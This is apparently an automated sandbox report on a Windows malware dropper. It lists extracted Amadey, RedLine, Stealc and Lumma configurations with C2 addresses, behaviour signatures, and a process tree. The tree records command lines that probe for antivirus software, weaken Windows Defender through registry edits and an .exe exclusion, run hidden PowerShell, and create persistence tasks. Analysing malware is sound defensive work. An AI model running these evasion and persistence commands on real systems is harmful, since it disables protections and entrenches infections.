Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    02-09-2024 05:08

General

  • Target

    bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555.exe

  • Size

    1.3MB

  • MD5

    046ebd7e0f619f33de609ea3f126b0d3

  • SHA1

    37a0b634955eb29f9bc7d3d434838cd729bb7e17

  • SHA256

    bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555

  • SHA512

    39afa534b862f9faebb4aa1ff4144a7d53f62adfd389531f75bdf10865fe8d846e79b3138ec90f2e9d4eb92a72e7a856f0c7be857a892a54eb2f2503f3030d10

  • SSDEEP

    24576:39O/bmU++vQu1TL9yJ5d2m8y7i1HlcoGpJ042jJpUeBk2h:3k/X+75dAyMGDP2dpUYXh

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

1176f2

C2

http://185.215.113.19

Attributes
  • install_dir

    417fd29867

  • install_file

    ednfoki.exe

  • strings_key

    183201dc3defc4394182b4bff63c4065

  • url_paths

    /CoreOPT/index.php

rc4.plain

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

65.21.18.51:45580

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

amadey

Version

4.41

Botnet

cd33f9

C2

http://193.176.158.185

Attributes
  • install_dir

    fed0c9a4d3

  • install_file

    Hkbsse.exe

  • strings_key

    a2163aef710017f5548e7e730af53cca

  • url_paths

    /B0kf3CbAbR/index.php

rc4.plain

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

lumma

C2

https://locatedblsoqp.shop/api

https://millyscroqwp.shop/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detects ZharkBot payload 1 IoCs

    ZharkBot is a botnet written C++.

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 3 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • ZharkBot

    ZharkBot is a botnet written C++.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 54 IoCs
  • Identifies Wine through registry keys 2 TTPs 7 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 5 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 35 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Drops file in System32 directory 33 IoCs
  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 12 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 13 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 13 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3400
      • C:\Users\Admin\AppData\Local\Temp\bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555.exe
        "C:\Users\Admin\AppData\Local\Temp\bf554462c091219488a1a53fff22213df8d9530fa6ff0f59033b0c9ee9173555.exe"
        2⤵
        • Drops file in Windows directory
        • Suspicious use of WriteProcessMemory
        PID:4268
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:788
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4104
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "wrsa opssvc"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:4696
          • C:\Windows\SysWOW64\tasklist.exe
            tasklist
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3020
          • C:\Windows\SysWOW64\findstr.exe
            findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
            4⤵
            • System Location Discovery: System Language Discovery
            PID:2980
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c md 591950
            4⤵
            • System Location Discovery: System Language Discovery
            PID:1332
          • C:\Windows\SysWOW64\findstr.exe
            findstr /V "BachelorRayPotentialBeats" Itsa
            4⤵
              PID:4156
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
              4⤵
                PID:2196
              • C:\Users\Admin\AppData\Local\Temp\591950\Shipment.pif
                Shipment.pif E
                4⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                • Suspicious use of WriteProcessMemory
                PID:3176
                • C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of FindShellTrayWindow
                  PID:5080
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 640
                    6⤵
                    • Program crash
                    PID:3192
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 684
                    6⤵
                    • Program crash
                    PID:872
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 748
                    6⤵
                    • Program crash
                    PID:2724
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 796
                    6⤵
                    • Program crash
                    PID:3020
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 876
                    6⤵
                    • Program crash
                    PID:484
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 940
                    6⤵
                    • Program crash
                    PID:684
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 992
                    6⤵
                    • Program crash
                    PID:3456
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 1028
                    6⤵
                    • Program crash
                    PID:1276
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 5080 -s 1008
                    6⤵
                    • Program crash
                    PID:1504
                • C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000169001\contorax.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  • Suspicious use of WriteProcessMemory
                  PID:4656
                  • C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
                    "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
                    6⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:1840
                • C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000172001\3546345.exe"
                  5⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  PID:1104
                • C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000220001\crypteda.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3576
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2992
                    • C:\Users\Admin\AppData\Roaming\tFehFcgiQk.exe
                      "C:\Users\Admin\AppData\Roaming\tFehFcgiQk.exe"
                      7⤵
                      • Executes dropped EXE
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1472
                    • C:\Users\Admin\AppData\Roaming\4BAf6MZHaE.exe
                      "C:\Users\Admin\AppData\Roaming\4BAf6MZHaE.exe"
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Modifies system certificate store
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2076
                • C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000221001\exbuild.exe"
                  5⤵
                  • Executes dropped EXE
                  • Drops file in Windows directory
                  • Suspicious use of FindShellTrayWindow
                  PID:1768
                  • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                    "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:4696
                    • C:\Users\Admin\AppData\Local\Temp\1000011001\joffer2.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000011001\joffer2.exe"
                      7⤵
                      • Executes dropped EXE
                      • Checks processor information in registry
                      PID:2948
                • C:\Users\Admin\AppData\Local\Temp\1000223001\f8960ed778.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000223001\f8960ed778.exe"
                  5⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Drops file in Windows directory
                  • Suspicious behavior: EnumeratesProcesses
                  PID:2460
                  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                    "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                    6⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Adds Run key to start application
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2232
                    • C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000002001\crypted.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2128
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        8⤵
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1668
                    • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
                      7⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:2452
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        8⤵
                          PID:828
                          • C:\Users\Admin\AppData\Roaming\pCOBhifFWw.exe
                            "C:\Users\Admin\AppData\Roaming\pCOBhifFWw.exe"
                            9⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2444
                          • C:\Users\Admin\AppData\Roaming\2tuqWipHFH.exe
                            "C:\Users\Admin\AppData\Roaming\2tuqWipHFH.exe"
                            9⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:4556
                      • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:1224
                      • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
                        7⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • System Location Discovery: System Language Discovery
                        • Checks processor information in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4284
                      • C:\Users\Admin\AppData\Local\Temp\1000129001\Set-up.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000129001\Set-up.exe"
                        7⤵
                        • Executes dropped EXE
                        • Checks processor information in registry
                        PID:2272
                      • C:\Users\Admin\AppData\Local\Temp\1000191001\1.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000191001\1.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:4308
                        • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                          C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                          8⤵
                          • Executes dropped EXE
                          PID:4420
                      • C:\Users\Admin\AppData\Local\Temp\1000228001\GetSys.exe
                        "C:\Users\Admin\AppData\Local\Temp\1000228001\GetSys.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2576
                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          8⤵
                          • System Location Discovery: System Language Discovery
                          PID:3112
                      • C:\Users\Admin\1000238002\Amadeus.exe
                        "C:\Users\Admin\1000238002\Amadeus.exe"
                        7⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1268
                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          8⤵
                            PID:5648
                        • C:\Users\Admin\AppData\Local\Temp\1000241001\build.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000241001\build.exe"
                          7⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4248
                        • C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2720
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                            8⤵
                              PID:7672
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c copy "C:\Users\Admin\AppData\Local\Temp\1000243001\runtime.exe" "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" && schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                              8⤵
                                PID:7472
                                • C:\Windows\system32\schtasks.exe
                                  schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\Admin\Pictures\Lighter Tech\runtime.exe" /F
                                  9⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:7624
                        • C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000255001\channel2.exe"
                          5⤵
                          • Executes dropped EXE
                          • Checks processor information in registry
                          PID:4956
                        • C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe
                          "C:\Users\Admin\AppData\Local\Temp\1000256001\BowExpert.exe"
                          5⤵
                          • Executes dropped EXE
                          PID:3532
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k move Luck Luck.bat & Luck.bat & exit
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:1028
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist
                              7⤵
                              • Enumerates processes with tasklist
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3088
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /I "wrsa opssvc"
                              7⤵
                              • System Location Discovery: System Language Discovery
                              PID:2684
                            • C:\Windows\SysWOW64\tasklist.exe
                              tasklist
                              7⤵
                              • Enumerates processes with tasklist
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3792
                            • C:\Windows\SysWOW64\findstr.exe
                              findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                              7⤵
                                PID:4236
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c md 684126
                                7⤵
                                  PID:3120
                                • C:\Windows\SysWOW64\findstr.exe
                                  findstr /V "VegetablesIndividualBindingGba" Ever
                                  7⤵
                                    PID:4328
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c copy /b ..\Wire + ..\Qualified + ..\Manufacturers + ..\Wesley + ..\Haiti + ..\Done + ..\Drop + ..\Runner + ..\Defend + ..\Judy + ..\Dow C
                                    7⤵
                                      PID:3020
                                    • C:\Users\Admin\AppData\Local\Temp\684126\Intake.pif
                                      Intake.pif C
                                      7⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Executes dropped EXE
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:4520
                                      • C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                        C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                        8⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        PID:6576
                                      • C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                        C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5224
                                      • C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                        C:\Users\Admin\AppData\Local\Temp\684126\RegAsm.exe
                                        8⤵
                                        • Executes dropped EXE
                                        PID:5092
                                    • C:\Windows\SysWOW64\choice.exe
                                      choice /d y /t 5
                                      7⤵
                                        PID:2188
                                  • C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000260001\Channel1.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Checks processor information in registry
                                    PID:1540
                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                      "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:7212
                                  • C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000262001\385107.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:3100
                                    • C:\Users\Admin\AppData\Local\Temp\7zS84BB.tmp\Install.exe
                                      .\Install.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      PID:4268
                                      • C:\Users\Admin\AppData\Local\Temp\7zS88A3.tmp\Install.exe
                                        .\Install.exe /XkVdidolEPC "385107" /S
                                        7⤵
                                        • Checks BIOS information in registry
                                        • Executes dropped EXE
                                        • Enumerates system info in registry
                                        PID:4020
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          8⤵
                                            PID:5092
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                              9⤵
                                              • Indirect Command Execution
                                              PID:980
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                10⤵
                                                  PID:5088
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                    11⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4556
                                              • C:\Windows\SysWOW64\forfiles.exe
                                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                9⤵
                                                • Indirect Command Execution
                                                PID:4400
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                  10⤵
                                                    PID:4908
                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                      11⤵
                                                      • System Location Discovery: System Language Discovery
                                                      PID:352
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                  9⤵
                                                  • Indirect Command Execution
                                                  PID:816
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    10⤵
                                                      PID:2428
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        11⤵
                                                          PID:2548
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                      9⤵
                                                      • Indirect Command Execution
                                                      PID:5720
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                        10⤵
                                                          PID:5516
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                            11⤵
                                                              PID:5404
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                          9⤵
                                                          • Indirect Command Execution
                                                          PID:7864
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                            10⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:7956
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                              11⤵
                                                              • Command and Scripting Interpreter: PowerShell
                                                              PID:8128
                                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                12⤵
                                                                  PID:5912
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                                          8⤵
                                                          • Indirect Command Execution
                                                          PID:32
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                            9⤵
                                                              PID:2988
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                10⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1264
                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                                  11⤵
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2192
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "bAURefglkfXMIGMYVR" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS88A3.tmp\Install.exe\" e1 /yvdidCNw 385107 /S" /V1 /F
                                                            8⤵
